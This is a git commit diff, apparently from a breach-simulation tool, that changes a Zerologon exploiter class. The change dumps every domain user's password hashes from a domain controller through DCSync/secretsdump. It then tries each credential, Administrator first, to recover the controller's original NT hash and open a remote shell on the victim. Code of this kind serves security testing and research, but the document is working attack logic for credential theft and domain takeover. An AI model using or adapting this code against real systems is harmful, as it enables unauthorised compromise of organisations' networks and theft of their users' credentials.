Try starting remote shell on victim with all user creds until successful

This commit is contained in:
Shreya 2021-02-20 01:04:35 +05:30
parent c227ccd3a1
commit 2ef892e33f
1 changed files with 26 additions and 16 deletions

View File

@ -7,7 +7,7 @@ import logging
import os
import re
from binascii import unhexlify
from typing import Dict, List, Optional
from typing import Dict, List, Optional, Tuple
import impacket
import nmb.NetBIOS
@ -206,17 +206,25 @@ class ZerologonExploiter(HostExploiter):
try:
rpc_con = None
# DCSync to get some username and its password's hashes.
LOG.debug("DCSync; getting some username and its password's hashes.")
user_details = self.get_user_details()
if not user_details:
raise Exception("Couldn't extract username and/or its password's hashes.")
# DCSync to get usernames and their passwords' hashes.
LOG.debug("DCSync; getting usernames and their passwords' hashes.")
user_creds = self.get_all_user_creds()
if not user_creds:
raise Exception("Couldn't extract any usernames and/or their passwords' hashes.")
# Use above extracted credentials to get original DC password's hashes.
LOG.debug("Getting original DC password's NT hash.")
original_pwd_nthash = None
for user_details in user_creds:
username = user_details[0]
user_pwd_hashes = [user_details[1]['lm_hash'], user_details[1]['nt_hash']]
try:
original_pwd_nthash = self.get_original_pwd_nthash(username, ':'.join(user_pwd_hashes))
if original_pwd_nthash:
break
except Exception as e:
LOG.info(f"Credentials \"{user_details}\" didn't work. Exception: {str(e)}")
if not original_pwd_nthash:
raise Exception("Couldn't extract original DC password's NT hash.")
@ -243,7 +251,7 @@ class ZerologonExploiter(HostExploiter):
if rpc_con:
rpc_con.disconnect()
def get_user_details(self) -> (str, Dict):
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
try:
options = OptionsForSecretsdump(
target=f"{self.dc_name}$@{self.dc_ip}", # format for DC account - "NetBIOSName$@0.0.0.0"
@ -257,13 +265,15 @@ class ZerologonExploiter(HostExploiter):
self._extract_user_creds_from_secrets(dumped_secrets=dumped_secrets)
creds_to_use_for_getting_original_pwd_hashes = []
admin = 'Administrator'
if admin in self._extracted_creds:
return admin, self._extracted_creds[admin]
else:
for user in self._extracted_creds.keys():
if self._extracted_creds[user]['RID'] >= 1000: # will only be able to log in with user accounts
return user, self._extracted_creds[user]
if user == admin: # most likely to work so try this first
creds_to_use_for_getting_original_pwd_hashes.insert(0, (user, self._extracted_creds[user]))
else:
creds_to_use_for_getting_original_pwd_hashes.append((user, self._extracted_creds[user]))
return creds_to_use_for_getting_original_pwd_hashes
except Exception as e:
LOG.info(f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}")